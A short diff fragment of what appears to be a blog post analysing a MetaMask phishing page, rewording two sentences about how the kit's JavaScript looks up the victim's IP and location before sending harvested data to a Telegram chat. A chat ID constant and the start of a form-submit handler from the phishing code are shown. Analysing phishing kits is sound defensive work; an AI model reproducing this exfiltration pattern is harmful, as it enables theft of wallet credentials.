200ug/golfed.xyz/content/posts/metamask-phishing-exploration.md

 const chatId = "7839331161";
 ```

-Before sending the collected information to the Telegram chat, the JavaScript code would also make a quick GET request to get the victim's public IP and related location data.
-I couldn't really figure out the point of this as MetaMask is a self-custodial wallet and doesn't utilize any kind of fraud prevention system that could stop the attacker from draining the targeted account if their geolocation didn't match with the wallet's owner.
+Before sending the gathered information to the chat, the JS snippet would also make a quick GET request to get the victim's public IP and related location data.
+I couldn't really figure out the point of this as MetaMask is a self-custodial wallet and doesn't utilize any kind of fraud prevention system that could stop the attacker from draining the targeted account if their geolocation didn't match the wallet's owner.

 ```javascript
 wordForm1.addEventListener("submit", (e) => {